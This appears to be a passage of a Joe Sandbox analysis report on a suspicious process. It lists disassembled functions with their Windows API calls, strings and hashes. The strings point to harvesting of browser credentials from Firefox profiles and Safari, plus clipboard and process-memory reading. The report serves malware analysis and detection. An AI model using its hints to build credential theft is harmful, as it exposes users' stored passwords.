                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastRead
                    • String ID:
                    • API String ID: 2136311172-0
                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@
                    • String ID:
                    • API String ID: 1936579350-0
                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                    Non-executed Functions

                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                    • GlobalFix.KERNEL32(00000000), ref: 00409927
                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                    • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                    • GetLastError.KERNEL32 ref: 0040995D
                    • CloseHandle.KERNEL32(?), ref: 00409969
                    • GetLastError.KERNEL32 ref: 00409974
                    • CloseClipboard.USER32 ref: 0040997D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                    • String ID:
                    • API String ID: 2565263379-0
                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadMessageProc
                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                    • API String ID: 2780580303-317687271
                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • EmptyClipboard.USER32 ref: 00409882
                    • wcslen.MSVCRT ref: 0040988F
                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                    • GlobalFix.KERNEL32(00000000), ref: 004098AC
                    • memcpy.MSVCRT ref: 004098B5
                    • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                    • CloseClipboard.USER32 ref: 004098D7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                    • String ID:
                    • API String ID: 2014503067-0
                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32 ref: 004182D7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                    • LocalFree.KERNEL32(?), ref: 00418342
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                    • String ID: OsError 0x%x (%u)
                    • API String ID: 403622227-2664311388
                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                    Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    • OpenClipboard.USER32(?), ref: 00411878
                    • GetLastError.KERNEL32 ref: 0041188D
                    • DeleteFileW.KERNEL32(?), ref: 004118AC
                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                      • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                      • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                    • String ID:
                    • API String ID: 1203541146-0
                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                    Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    • API String ID: 1865533344-0
                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                    Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Version
                    • String ID:
                    • API String ID: 1889659487-0
                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                    Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: NtdllProc_Window
                    • String ID:
                    • API String ID: 4255912815-0
                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                    Download Yara Rule
                    APIs
                    • _wcsicmp.MSVCRT ref: 004022A6
                    • _wcsicmp.MSVCRT ref: 004022D7
                    • _wcsicmp.MSVCRT ref: 00402305
                    • _wcsicmp.MSVCRT ref: 00402333
                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • memset.MSVCRT ref: 0040265F
                    • memcpy.MSVCRT ref: 0040269B
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • memcpy.MSVCRT ref: 004026FF
                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                    • API String ID: 577499730-1134094380
                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                    • String ID: :stringdata$ftp://$http://$https://
                    • API String ID: 2787044678-1921111777
                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                    • GetWindowRect.USER32(?,?), ref: 00414088
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                    • GetDC.USER32 ref: 004140E3
                    • wcslen.MSVCRT ref: 00414123
                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                    • ReleaseDC.USER32(?,?), ref: 00414181
                    • _snwprintf.MSVCRT ref: 00414244
                    • SetWindowTextW.USER32(?,?), ref: 00414258
                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                    • GetClientRect.USER32(?,?), ref: 004142E1
                    • GetWindowRect.USER32(?,?), ref: 004142EB
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                    • GetClientRect.USER32(?,?), ref: 0041433B
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                    • String ID: %s:$EDIT$STATIC
                    • API String ID: 2080319088-3046471546
                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                    Download Yara Rule
                    APIs
                    • EndDialog.USER32(?,?), ref: 00413221
                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                    • memset.MSVCRT ref: 00413292
                    • memset.MSVCRT ref: 004132B4
                    • memset.MSVCRT ref: 004132CD
                    • memset.MSVCRT ref: 004132E1
                    • memset.MSVCRT ref: 004132FB
                    • memset.MSVCRT ref: 00413310
                    • GetCurrentProcess.KERNEL32 ref: 00413318
                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                    • memset.MSVCRT ref: 004133C0
                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                    • memcpy.MSVCRT ref: 004133FC
                    • wcscpy.MSVCRT ref: 0041341F
                    • _snwprintf.MSVCRT ref: 0041348E
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                    • SetFocus.USER32(00000000), ref: 004134B7
                    Strings
                    • {Unknown}, xrefs: 004132A6
                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                    • API String ID: 4111938811-1819279800
                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                    • EndDialog.USER32(?,?), ref: 0040135E
                    • DeleteObject.GDI32(?), ref: 0040136A
                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                    • ShowWindow.USER32(00000000), ref: 00401398
                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                    • ShowWindow.USER32(00000000), ref: 004013A7
                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                    • String ID:
                    • API String ID: 829165378-0
                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00404172
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 004041D6
                    • wcscpy.MSVCRT ref: 004041E7
                    • memset.MSVCRT ref: 00404200
                    • memset.MSVCRT ref: 00404215
                    • _snwprintf.MSVCRT ref: 0040422F
                    • wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 0040426E
                    • memset.MSVCRT ref: 004042CD
                    • memset.MSVCRT ref: 004042E2
                    • _snwprintf.MSVCRT ref: 004042FE
                    • wcscpy.MSVCRT ref: 00404311
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                    • API String ID: 2454223109-1580313836
                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                    • SetMenu.USER32(?,00000000), ref: 00411453
                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                    • memcpy.MSVCRT ref: 004115C8
                    • ShowWindow.USER32(?,?), ref: 004115FE
                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                    • API String ID: 4054529287-3175352466
                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset$wcscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 3143752011-1996832678
